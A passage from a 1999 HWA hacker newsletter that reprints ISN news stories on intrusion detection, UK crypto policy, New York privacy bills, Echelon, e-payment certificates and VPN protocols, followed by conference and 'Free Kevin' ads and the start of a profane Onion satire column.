  7443.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7444.       
  7445.       @HWA     
  7446.      
  7447.  
  7448.  50.0 [ISN] New Tools Prevent Network Attacks
  7449.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7450.  
  7451.  
  7452.  
  7453.       http://www.nytimes.com/techweb/TW_New_Tools_Prevent_Network_Attacks.html
  7454.       
  7455.       
  7456.       June 3, 1999
  7457.       New Tools Prevent Network Attacks
  7458.       Filed at 8:49 a.m. EDT
  7459.         
  7460.       IT managers alarmed by high-profile security breaches are gaining new
  7461.       software tools to ward off network attacks. 
  7462.       
  7463.       
  7464.       Axent Technologies this week will release an intrustion-detection system
  7465.       with improvements to protect networks against a range of existing and new
  7466.       types of attacks in real time. 
  7467.       
  7468.       
  7469.       Internet Security Systems (ISS) will rollout a souped-up version of its
  7470.       RealSecure system that filters out false alarms from real attacks with
  7471.       greater efficiency and precision. Other vendors said they plan product
  7472.       updates by year's end. CyberSafe, for example, will deliver security
  7473.       features that detect intrusions in individual applications. 
  7474.       
  7475.       
  7476.       The advancing functionality of these high-tech burglar alarms comes as
  7477.       Internet-based computing exposes security vulnerabilities. Recent hacker
  7478.       attacks on the FBI and other government websites, as well as the loss of
  7479.       sensitive nuclear weapons information to China, have heightened corporate
  7480.       awareness of the need for multiple layers of network security. 
  7481.       
  7482.       
  7483.       As intrusion-detection systems "enter their midlife, they are starting to
  7484.       become a viable part of the total protection strategy in many
  7485.       corporations," said Mike Hagger, vice president of network security at
  7486.       Oppenheimer Funds. The investment company uses ISS' RealSecure to identify
  7487.       and respond to certain types of hacker attacks, such as SYN flood attacks. 
  7488.       
  7489.       
  7490.       "Intrusion detection is only one line of defense," Hagger added, citing
  7491.       the need for firewalls, antivirus and authentication tools. 
  7492.       
  7493.       
  7494.       Jim Patterson, director of security at service provider Level 3
  7495.       Communications, agreed, saying intrusion-detection systems must move
  7496.       beyond simple event detection to behavioral analysis. If an intruder is
  7497.       using a "valid ID or password, the typical system wouldn't pick that up as
  7498.       wrong behavior," he said. 
  7499.       
  7500.       
  7501.       IT managers also need tools that will help them build a baseline of
  7502.       typical usage patterns. Thus, if a user tried to access a network at 2
  7503.       a.m., for example, an IT manager would be notified. 
  7504.       
  7505.       
  7506.       "I want to get details on what things are being accessed and what systems
  7507.       are being used," Patterson said. 
  7508.       
  7509.       
  7510.       For Electronic Data Systems, intrusion detection could be the first line
  7511.       of defense. The IT services provider is testing Axent's NetProwler 3.0 on
  7512.       the access point into the network-outside the firewall, said Wayde York, a
  7513.       network operations supervisor at EDS. 
  7514.       
  7515.       
  7516.       By placing NetProwler at the network perimeter, it can detect "stealth
  7517.       scans and newer attacks" that the firewall typically won't pick up, he
  7518.       said. Placing the intrusion- detection system in front of the firewall
  7519.       also reduces the false alarms common to these network-based systems, York
  7520.       said, because it's less likely to have to monitor a wide variety of
  7521.       traffic types, as it would inside the firewall. 
  7522.       
  7523.       
  7524.       NetProwler 3.0 also can send alerts to Check Point Software Technologies'
  7525.       Firewall-1 product -- which EDS uses -- once an attack is detected so that
  7526.       the firewall could then be reconfigured to fend off future attacks of the
  7527.       same type, York said. 
  7528.       
  7529.       
  7530.       Tighter integration between NetProwler and Axent's host-based Intruder
  7531.       Alert system lets IT managers monitor network devices and servers from
  7532.       Intruder Alert's central management console. Protecting mixed platforms
  7533.       and critical resources is the goal behind ISS' product rollout, scheduled
  7534.       for the week of June 14.
  7535.       
  7536.       
  7537.       -o-
  7538.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7539.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7540.       
  7541.       @HWA
  7542.  
  7543.  
  7544.  51.0 [ISN] U.K. Crypto Policy May Have Hidden Agenda
  7545.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7546.  
  7547.       
  7548.       http://www.nytimes.com/techweb/TW_U_K_Crypto_Policy_May_Have_Hidden_Agenda.html
  7549.       
  7550.       
  7551.       June 3, 1999
  7552.       U.K. Crypto Policy May Have Hidden Agenda
  7553.       Filed at 5:06 a.m. EDT
  7554.       By Madeleine Acey for TechWeb, CMPnet
  7555.         
  7556.       Despite its abandonment of key escrow, the U.K. could be counting on the
  7557.       ignorance of new Internet users to provide law enforcement easy access to
  7558.       private communications, according to privacy campaigners. 
  7559.       
  7560.       
  7561.       Following a meeting in London on Wednesday, where ISPs drafted a code of
  7562.       practice for protecting user privacy, ISP and civil liberties groups both
  7563.       derided British and European Union attempts to regulate the use of
  7564.       encryption, caching and unsolicited email. 
  7565.       
  7566.       
  7567.       ISP organizations, such as the London Internet Exchange -- or LINX --
  7568.       described government policy as "extremely stupid," "misguided" and
  7569.       "infeasible." But some said they found it hard to believe incompetence was
  7570.       behind it. 
  7571.       
  7572.       
  7573.       LINX chairman Keith Mitchell said the latest version of proposed
  7574.       legislation regarding law enforcement access to encrypted email and
  7575.       computer files was based on a "misguided conception" that ISPs would
  7576.       provide users with encryption. 
  7577.       
  7578.       
  7579.       A senior government official said last week the government expected most
  7580.       warrants demanding keys to encrypted material would be served on service
  7581.       providers. 
  7582.       
  7583.       
  7584.       "The only encryption of any use on the Internet is end-to-end. The keys
  7585.       are generated between the users. All the ISP is going to see is an
  7586.       encrypted data stream," Mitchell said. 
  7587.       
  7588.       
  7589.       "I still don't know a single Home Office employee that has an email
  7590.       address," he said. But of the encryption warrant policy, he said the
  7591.       government "either doesn't understand or is deliberately
  7592.       misunderstanding." 
  7593.       
  7594.       
  7595.       "I think they are deliberate," said Yaman Akdeniz of Cyber-Rights &
  7596.       Cyber-Liberties. "They don't want to give away what they want to do." He
  7597.       said there was a lot of pressure on lawmakers from the National Criminal
  7598.       Intelligence Service, which wanted easy access. 
  7599.       
  7600.       
  7601.       "The Home Office believes users will go to [third parties], like the Post
  7602.       Office, to get keys," said Nicholas Bohm, spokesman for the Foundation for
  7603.       Information Policy Research. "They should not be promoting a policy where
  7604.       private keys are generated by anybody but the user." 
  7605.       
  7606.       
  7607.       He, along with Akdeniz, said it was possible the government was planning
  7608.       to create a new market, favorable to easy law enforcement access, where
  7609.       new Internet users -- unaware of the tradition of free user-to-user
  7610.       encryption -- would go to "trusted third parties" for encryption services
  7611.       because they were endorsed by the government as safe. "If these new
  7612.       services are there, many people will use them," Akdeniz said. 
  7613.       
  7614.       
  7615.       -o-
  7616.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7617.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7618.       
  7619.       @HWA
  7620.  
  7621.  52.0 [ISN] Tackling E-Privacy in New York
  7622.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7623.       
  7624.       Forwarded From: Dan Moniz <dnm@unix-security.net>
  7625.       
  7626.       
  7627.       Tackling E-Privacy in New York
  7628.       by Chris Oakes 
  7629.       
  7630.       
  7631.       If the federal government won't get tough with the issue of online
  7632.       consumer privacy, New York state is determined to do it. 
  7633.       
  7634.       
  7635.       The New York State Assembly has passed the part of a legislative package
  7636.       designed to erect unprecedented privacy safeguards for consumer
  7637.       information in the information age. 
  7638.       
  7639.       
  7640.       "The more you learn about computers and email and ordering and passing
  7641.       information by email and the Internet, the more people realize that laws
  7642.       that protect them in different venues are not in place on the Internet,"
  7643.       said Assemblywoman Audrey Pheffer. 
  7644.       
  7645.       
  7646.       Pheffer, a Democrat from Queens, is head of the Consumer Affairs and
  7647.       Protections Committee and author of several measures in the legislative
  7648.       package, considered the most comprehensive state action on consumer
  7649.       privacy to date. 
  7650.       
  7651.       
  7652.       Fourteen bills passed last week are expected to pass committee and reach
  7653.       the assembly floor as early as this week. The New York Senate plans to
  7654.       present its own privacy package this summer. 
  7655.       
  7656.       
  7657.       The broad-ranging measures grew out of the increasing availability of
  7658.       personal information. The bills target privacy invasions that the assembly
  7659.       said could lead to everything from personal financial loss and damaged
  7660.       credit ratings to discrimination. 
  7661.       
  7662.       
  7663.       The authors blame the new risks on computers and Internet use, and modern
  7664.       technology in general, which threaten privacy with everything from DNA
  7665.       advances to the widespread selling and distribution of digital
  7666.       information. 
  7667.       
  7668.       
  7669.       "We had to do this because three to five years ago we never thought when
  7670.       we passed legislation that this would be something we'd have to deal with
  7671.       -- the theft of identity, the selling of email information, the selling of
  7672.       digital photo images," Pheffer said. 
  7673.       
  7674.       
  7675.       The bills require confidentiality of personal records, prevent the selling
  7676.       of email addresses without consent, and prohibit various sophisticated
  7677.       telemarketing tricks enabled by modern technology. 
  7678.       
  7679.       
  7680.       "We tried to deal with the many issues we and the attorney general have
  7681.       received complaints on," Pheffer said. 
  7682.       
  7683.       
  7684.       Whereas consumers used to worry about the theft of a credit card or a
  7685.       driver license, Pheffer said that the dangers of information theft are
  7686.       much greater. 
  7687.       
  7688.       
  7689.       "[A thief] can steal everything so that they [can] become you. We've had
  7690.       stories where people had automobiles ordered [in their name] and just by
  7691.       luck were able to actually stop the delivery of the car. It's much more
  7692.       than the stealing of a credit card."
  7693.       
  7694.       
  7695.       Identity theft is enabled by electronic access to home addresses, social
  7696.       security numbers, and the like, Pheffer said. 
  7697.       
  7698.       
  7699.       The new legislation isn't just targeted at data collected by thieves. It
  7700.       places companies under scrutiny, too. 
  7701.       
  7702.       
  7703.       "As technology provides more efficient ways for commercial enterprises to
  7704.       gather and distribute information to consumers, it is vital that the laws
  7705.       of the state be modernized to ensure personal privacy," said Attorney
  7706.       General Eliot Spitzer in statement. Spitzer is one of the primary authors
  7707.       and presenters of the legislative package. 
  7708.       
  7709.       
  7710.       Spitzer said that the legislation he authored will strengthen the
  7711.       individual's control over personal information. 
  7712.       
  7713.       
  7714.       Privacy experts and advocates are enthused. 
  7715.       
  7716.       
  7717.       "The New York legislation package is very, very exciting," said Paul
  7718.       Schwartz, a law professor at Brooklyn Law School. "I think that this is
  7719.       something that is going to shift power to people on the Internet, and
  7720.       increase the transparencies of [privacy] policies [online]." 
  7721.       
  7722.       
  7723.       "It's not surprising that states are moving when Washington policy
  7724.       legislators are largely sitting on their hands," said Marc Rotenberg,
  7725.       executive director of the Electronic Privacy Information Center. 
  7726.       
  7727.       
  7728.       Existing federal measures to protect consumer privacy are largely directed
  7729.       at children. The Federal Trade Commission is charged with protecting
  7730.       privacy, but it can only bring limited civil actions. 
  7731.       
  7732.       
  7733.       Critics charge that the US Commerce Department has failed to put its teeth
  7734.       behind consumer privacy because the Internet industry has successfully
  7735.       lobbied the agency that the associated costs of such a move would threaten
  7736.       the nation's lead in global e-commerce. 
  7737.       
  7738.       
  7739.       In a privacy hearing in Washington last week, Rotenberg said that Congress
  7740.       showed itself to be inactive on the issue. 
  7741.       
  7742.       
  7743.       "Everyone sat back and said 'Oh, it looks like self-regulation is working
  7744.       [and we] don't need to do anything.... By and large, I think the states
  7745.       have not been very impressed. So now they're dealing with wide range of
  7746.       issues." 
  7747.       
  7748.       
  7749.       New York has been a state leader in areas of consumer protection and
  7750.       privacy protection, Rotenberg said. 
  7751.       
  7752.       
  7753.       But Rotenberg noted that the potential impact of the various bills on
  7754.       Internet activity is still unclear. "By and large, the bills really target
  7755.       activity off the Internet," Rotenberg said. "[They] treat the Internet as
  7756.       one of many privacy issues." 
  7757.       
  7758.       
  7759.       Still, one of the measures in the package would add a prohibition of the
  7760.       sale, lease, or exchange of any consumer's email address and any other
  7761.       personal identifying information that might be obtained online without a
  7762.       consumer's consent. 
  7763.       
  7764.       
  7765.       Jason Catlett, of the online privacy watchdog group Junkbusters, is
  7766.       especially pleased with that measure. 
  7767.       
  7768.       
  7769.       But he and others caution that the statewide reach of the legislation is
  7770.       one caveat for anyone hoping for far-reaching impact. 
  7771.       
  7772.       
  7773.       "Most privacy advocates and experts would prefer to see broad federal
  7774.       legislation for the protection of personal data," said Catlett. "But some
  7775.       of these piecemeal measures may prevent some very specific injuries that
  7776.       consumers are suffering daily." 
  7777.       
  7778.       
  7779.       Still, he said that some of the bills have a "private right of action,
  7780.       which allows individual consumers to sue companies that invade their
  7781.       privacy." That principle has worked well in telemarketing legislation and
  7782.       deserves to be extended to personal data protection, he said. 
  7783.       
  7784.       
  7785.       -o-
  7786.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7787.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7788.       
  7789.       @HWA       
  7790.  
  7791.  
  7792.  53.0 [ISN] Congress, NSA butt heads over Echelon
  7793.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  7794.  
  7795.        Forwarded From: Putrefied Cow <waste@zor.hut.fi>
  7796.       Originally From: 7Pillars Partners <partners@sirius.infonex.com>
  7797.       
  7798.       
  7799.       Congress, NSA butt heads over Echelon
  7800.          
  7801.       BY DANIEL VERTON (dan_verton@fcw.com)
  7802.          
  7803.       Congress has squared off with the National Security Agency over a
  7804.       top-secret U.S. global electronic surveillance program, requesting top
  7805.       intelligence officials to report on the legal standards used to prevent
  7806.       privacy abuses against U.S. citizens. 
  7807.          
  7808.       According to an amendment to the fiscal 2000 Intelligence Authorization
  7809.       Act proposed last month by Sen. Bob Barr (R-Ga.), the director of Central
  7810.       Intelligence, the director of NSA and the attorney general must submit a
  7811.       report within 60 days of the bill becoming law that outlines the legal
  7812.       standards being employed to safeguard the privacy of American citizens
  7813.       against Project Echelon. 
  7814.          
  7815.       Echelon is NSA's Cold War-vintage global spying system, which consists of
  7816.       a worldwide network of clandestine listening posts capable of intercepting
  7817.       electronic communications such as e-mail, telephone conversations, faxes,
  7818.       satellite transmissions, microwave links and fiber-optic communications
  7819.       traffic. However, the European Union last year raised concerns that the
  7820.       system may be regularly violating the privacy of law-abiding citizens
  7821.       [FCW, Nov. 17, 1998]. 
  7822.          
  7823.       However, NSA, the supersecret spy agency known best for its worldwide
  7824.       eavesdropping capabilities, for the first time in the history of the House
  7825.       Permanent Select Committee on Intelligence refused to hand over documents
  7826.       on the Echelon program, claiming attorney/client privilege. 
  7827.          
  7828.       Congress is "concerned about the privacy rights of American citizens and
  7829.       whether or not there are constitutional safeguards being circumvented by
  7830.       the manner in which the intelligence agencies are intercepting and/or
  7831.       receiving international communications...from foreign nations that would
  7832.       otherwise be prohibited by...the limitations on the collection of domestic
  7833.       intelligence," Barr said. "This very straightforward amendment...will help
  7834.       guarantee the privacy rights of American citizens [and] will protect the
  7835.       oversight responsibilities of the Congress which are now under assault" by
  7836.       the intelligence community. 
  7837.          
  7838.       Calling NSA's argument of attorney/client privilege "unpersuasive and
  7839.       dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability
  7840.       of the intelligence community to deny access to documents on intelligence
  7841.       programs could "seriously hobble the legislative oversight process"
  7842.       provided for by the Constitution and would "result in the envelopment of
  7843.       the executive branch in a cloak of secrecy." 
  7844.       
  7845.       
  7846.       -o-
  7847.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7848.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7849.       
  7850.       @HWA
  7851.  
  7852.  54.0 [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives
  7853.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7854.   
  7855.  
  7856.        Forwarded From: darek milewski <darekm@cmeasures.com>
  7857.       
  7858.       
  7859.       Visa, Wells Fargo Deliver E-Payment Alternatives
  7860.       
  7861.       
  7862.       New Options for handling credit card transactions over the Web are
  7863.       emerging as cheaper and simpler alternatives to the dormant SET standard. 
  7864.       
  7865.       
  7866.       As merchants continue to call for SET alternatives, two financial services
  7867.       giants--credit card company Visa International and online banking leader
  7868.       Wells Fargo & Co.--are trying a new approach: issuing digital certificates
  7869.       for use in SSL-based sessions. 
  7870.       
  7871.       
  7872.       Visa, which co-developed SET with MasterCard International, will now let
  7873.       banks issue RSA Data Security X.509 digital certificates to merchants and
  7874.       will provide those banks with data collection, authorization, routing and
  7875.       settlement services for Internet transactions through its new Visa Payment
  7876.       Gateway. 
  7877.       
  7878.       
  7879.       The gateway, to go live this summer, gives merchants using the Visanet
  7880.       point-of-sale network access to that same network through Web channels.
  7881.       That means there's no legacy-systems integration required by Visa USA's
  7882.       6,000 member banks, many of which have characterized the Secure Electronic
  7883.       Transactions (SET) protocol as a gamble because of the implementation
  7884.       costs. 
  7885.       
  7886.       
  7887.       Visa's gateway arrives just one week after Wells Fargo said it will offer
  7888.       merchants e-commerce services that combine Secure Sockets Layer (SSL)
  7889.       encryption with digital certification. Wells Fargo has partnered with
  7890.       GTE's CyberTrust business unit to issue digital certificates to merchants. 
  7891.       
  7892.       
  7893.       While both Visa and Wells Fargo still support SET, the moves underscore
  7894.       the difficulties that SET has faced. 
  7895.       
  7896.       
  7897.       Few merchants and banks have installed SET-enabled systems because of
  7898.       their cost and complexity. In fact, less than 1 percent of U.S. merchants
  7899.       polled by Forrester Research said they are using or plan to use SET on
  7900.       their sites. Also, consumers have little incentive to use the e-wallet
  7901.       applications that SET requires, analysts said. 
  7902.       
  7903.       
  7904.       Today, most Web storefronts protect credit card data using SSL encryption
  7905.       but do not validate users' identities with digital certificates. 
  7906.       
  7907.       
  7908.       -- Jeffrey Schwartz
  7909.       
  7910.       
  7911.       http://www.internetwk.com/story/INW19990602S0002
  7912.       
  7913.       
  7914.       -o-
  7915.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7916.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7917.       
  7918.       @HWA
  7919.  
  7920.  55.0 [ISN] Protocols serve up VPN security
  7921.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7922.  
  7923.        Forwarded From: darek milewski <darekm@cmeasures.com>
  7924.       
  7925.       
  7926.       http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/tech/0531tech.html
  7927.       
  7928.       
  7929.       Protocols serve up VPN security
  7930.       By GREG MARCOTTE
  7931.       Network World, 05/31/99
  7932.       
  7933.       
  7934.       As the need to securely open corporate LANs to telecommuters and disparate
  7935.       corporate sites grows, virtual private networks (VPN) continue to meet the
  7936.       demand. VPNs - which establish private, secure sessions between two or
  7937.       more LANs or between remote users and a LAN - use the Internet or private
  7938.       IP networks to distribute data and enable corporations to eliminate
  7939.       additional, often expensive, dedicated lines or remote access servers. 
  7940.       
  7941.       
  7942.       Today, network executives must weigh two protocols that specify how VPNs
  7943.       should be built. The Point-to-Point Tunneling Protocol (PPTP) and IP
  7944.       Security (IPSec) protocol enable private sessions over the Internet and
  7945.       securely link remote users to corporate networks. The protocols also
  7946.       possess relative strengths and weaknesses in data security and ease of
  7947.       deployment.  Network managers must determine which VPN protocol best suits
  7948.       the need of their organizations. 
  7949.       
  7950.       
  7951.       
  7952.       Diagram of how PPTP works
  7953.       
  7954.       
  7955.       PPTP vs. IPSec security
  7956.       
  7957.       
  7958.       Spearheaded by Microsoft and US Robotics, PPTP was first intended for
  7959.       dial-up VPNs. The protocol was meant to augment remote access usage by
  7960.       letting users dial in to local ISPs and tunnel into their corporate
  7961.       networks. Unlike IPSec, PPTP was not intended to address LAN-to-LAN
  7962.       tunneling when it was first created. 
  7963.       
  7964.       
  7965.       PPTP extends PPP - a protocol that defines point-to-point connections
  7966.       across an IP network. PPP is widely used to connect dial-up and broadband
  7967.       users to the public Internet or private corporate networks. Because PPP
  7968.       functions at Layer 2, a PPTP connection that encapsulates PPP packets
  7969.       allows users to send packets other than IP, such as IPX or NetBEUI. IPSec,
  7970.       on the other hand, functions at Layer 3 and is only able to provide the
  7971.       tunneled transport of IP packets. 
  7972.       
  7973.       
  7974.       The encryption method commonly used in PPTP is defined at the PPP layer. 
  7975.       Typically, the PPTP client is the Microsoft desktop, and the encryption
  7976.       protocol used is Microsoft Point-to-Point Encryption (MPPE). MPPE is based
  7977.       on the RSA RC4 standard and supports 40-bit or 128-bit encryption.
  7978.       Although this level of encryption is satisfactory for many applications,
  7979.       it is generally regarded as less secure than some of the encryption
  7980.       algorithms offered by IPSec, particularly 168-bit Triple-Data Encryption
  7981.       Standard (DES). 
  7982.       
  7983.       
  7984.       Protect and serve
  7985.       
  7986.       
  7987.       Meanwhile, IPSec was built for secure tunneling over the Internet between
  7988.       protected LANs. It was meant for a connection with a remote office,
  7989.       another LAN or corporate supplier. For instance, a large automotive
  7990.       company could use an IPSec VPN to securely connect its suppliers and
  7991.       support purchases orders over the 'Net. 
  7992.       
  7993.       
  7994.       IPSec also supports connections between remote users and corporate
  7995.       networks. Similarly, Microsoft added LAN-to-LAN tunneling support for PPTP
  7996.       in its Routing and Remote Access Server for Windows NT Server 4.0. 
  7997.       
  7998.       
  7999.       When it comes to strong encryption and data integrity, IPSec is generally
  8000.       regarded as superior. The protocol combines key management with support
  8001.       for X.509 certificates, information integrity and content security.
  8002.       Furthermore, 168-bit Triple-DES encryption, the strongest form of
  8003.       encryption available in IPSec, is more secure than 128-bit RC4 encryption.
  8004.       IPSec also provides packet-by-packet encryption and authentication and
  8005.       prevents the "man-in-the-middle attack," in which data is intercepted by a
  8006.       third party, reconstructed and sent to the receiver. 
  8007.       
  8008.       
  8009.       PPTP, however, is vulnerable to such assaults, primarily because it
  8010.       authenticates sessions but not individual packets. Note, however, that
  8011.       mounting a successful man-in-the-middle attack against a PPTP connection
  8012.       would take considerable effort and know-how. 
  8013.       
  8014.       
  8015.       For many corporations, the ability to run PPTP from the Windows platform
  8016.       (it supports Windows NT, 95 and 98) can make deploying and maintaining a
  8017.       VPN seamless. For others, PPTP is perceived as less secure than IPSec. 
  8018.       
  8019.       
  8020.       It is important to bear in mind, however, if deploying a VPN for remote
  8021.       users, IPSec requires an organization to load specialized client software
  8022.       on each desktop. Client software deployment and maintenance are a weighty
  8023.       undertaking that must be considered. In terms of simplicity, PPTP is
  8024.       substantially easier to deploy. 
  8025.       
  8026.       @HWA
  8027.  
  8028.  AD.S ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
  8029.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8030.        *****************************************************************************
  8031.        *                                                                           *
  8032.        *           ATTRITION.ORG     http://www.attrition.org                      *
  8033.        *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
  8034.        *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
  8035.        *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
  8036.        *                                                                           *
  8037.        *****************************************************************************
  8038.        
  8039.        <img src="http://www.csoft.net/~hwa/canc0n.gif"> <br>    Come.to/Canc0n99</a>
  8040.        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  8041.        http://come.to/Canc0n99  http://come.to/Canc0n99 http://come.to/Canc0n99http:j
  8042.        http:/                                                               99 http:o
  8043.        http:/  login: sysadmin                                              n99 httpi
  8044.        /come.  password:                                                    tp://comn
  8045.        to/Can                                                               me.to/Cat
  8046.        c0n99   SYSTEM NEWS: Canc0n99 is looking for more speakers and       Canc0n99h
  8047.        http:/  industry people to attend with booths and talks.             99 http:e
  8048.        /come.  you could have a booth and presentation for the cost of      p://comel
  8049.        http:/  little more than a doorprize (tba) contact us at our main    n99http:i
  8050.        http:/  address for info hwa@press.usmc.net, also join the mailing   n99http:s
  8051.        http:/  for updates. This is the first Canadian event of its type    invalid t
  8052.        403 Fo  and will have both white and black hat attendees, come out   logged! !
  8053.        404 Fi  and shake hands with the other side... *g* mainly have some  IP locked
  8054.        ome.to  fun and maybe do some networking (both kinds). see ya there! hostname 
  8055.        http:/                                                               x99http:x
  8056.        o/Canc                                                               x.to/Canx                 
  8057.        http://come.to/Canc0n99  http://come.to/Canc0n99 http://come.to/Canc0n99http:x
  8058.        o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
  8059.         http://come.to/Canc0n99  http://come.to/Canc0n99  http://come.to/Canc0n99 
  8060.  <a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
  8061.        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
  8062.         
  8063.        $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
  8064.        !                                                                            !       
  8065.        $                                                                            $       
  8066.        !     *** IT HAS BEEN FOUR YEARS! ***    FREE KEVIN MITNICK NOW!!!! **       !
  8067.        $                                                                            $              
  8068.        !                                                                            !
  8069.        $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
  8070.  
  8071.        www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
  8072.       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
  8073.        m www.2600.com ########################################ww.2600.com www.freeke
  8074.        vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
  8075.        com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
  8076.        kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
  8077.        k.com www.2600.########################################om www.2600.com www.fre
  8078.        ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
  8079.        k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
  8080.  
  8081.        <a href="http://www.2600.com/">www.2600.com</a>
  8082.        <a href="http://www.kevinmitnick.com></a>
  8083.        
  8084.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  8085.        * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
  8086.        *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
  8087.     <a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
  8088.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  8089.  
  8090.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  8091.        * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
  8092.        * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
  8093.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  8094.  
  8095.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  8096.        * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
  8097.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  8098.  
  8099.  
  8100.          //////////////////////////////////////////////////////////////////////////////
  8101.         //  To place an ad in this section simply type it up and email it to        //
  8102.        //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
  8103.       //////////////////////////////////////////////////////////////////////////////
  8104.  
  8105.  
  8106.      @HWA
  8107.  
  8108. HA.HA Humour and puzzles ...etc
  8109.       ~~~~~~~~~~~~~~~~~~~~~~~~~
  8110.                                                            Don't worry. worry a *lot*
  8111.      
  8112.       Send in submissions for this section please! .............    
  8113.       
  8114.      
  8115.       Scarfed from PacketStorm via The Onion;
  8116.  
  8117.       I Am a Bad Ass 
  8118.  
  8119.       
  8120.       By Herbert Kornfeld 
  8121.       Accounts Receivable Supervisor 
  8122.       
  8123.             YO, waaasssuuup, baby? H-Dog is back, and don't nobody fuck with this BADASS. You wanna fuck me, motherfucker? You gonna wish you didn't. 'Cause I
  8124.       the Accounts Receivable supervisor of Midstate Office Supply, and I AM a cold-blooded badass motherfucker, and if you fuck with me I'll go stone cold crazy on
  8125.       your ass. 
  8126.       
  8127.             Like that motherfucker Steve Englebreiter of Associated Publishing House. Asshole thought he could postdate his goddamn check on a bill that was overdue for
  8128.       nearly a month and a half. I caught it right before we was ready to deposit it. Don't tell me it was no mistake; cocksucker knew what he was doing all along. Know
  8129.       what I did? Sent the goddamn thing right back along with a note saying we be passing his account along to a collection agency in two weeks if his bitch ass didn't pay
  8130.       up. 
  8131.       
  8132.             Now, legally, we only supposed to notify our collection agency after 90 days, not a month and a half. But I didn't have to tell thefool that. Three days later
  8133.       cocksucker sends us a cashier's check via overnight mail for the full amount. Ain't nobody fucks with my badass self. 
  8134.       
  8135.             Or take that ol' bitch Mildred Fladner who's always callin' up, bitchin' about her credit balance. 
  8136.       
  8137.             "Those staplers only cost $36.50 for the half-dozen, not $38.50. Your cashier rung it up wrong." 
  8138.       
  8139.             Then how come you didn't notice it then, y'ol ho? She high and everybody know it, but she make such a big deal about knowing the company president and
  8140.       everything she got everybody runnin' scared. Except this BAD ASS. 
  8141.       
  8142.             So I go downstairs to the register she bought the staplers at, reset the date, duplicate the cashier number and purchase number, and ring the goddamn shit up at
  8143.       $39.50. Then I call her back sayin' I found the original detail tape and check it out, it looks like you owe us a dollar additional, plus extra sales tax, your own receipt
  8144.       must have come out poor. A week later I get a payment for the full amount, with her apologies. I pocket the extra buck and change, spend it on a lotto ticket, and
  8145.       win five bucks. It's payback time for that bitch. 
  8146.       
  8147.             Now don't be messin' me up with the Accounts Payable Supervisor. The Accounts Payable Supervisor, he ain't no badass. Hell, he ain't even no man. His name
  8148.       is Myron or something, and he so old he can't even get it up no more. I gots a bitch in the cash room. Myron, everybody laugh at him. He supposed to be the one
  8149.       that got the money but everybody know I got it and it's no even my job. 
  8150.       
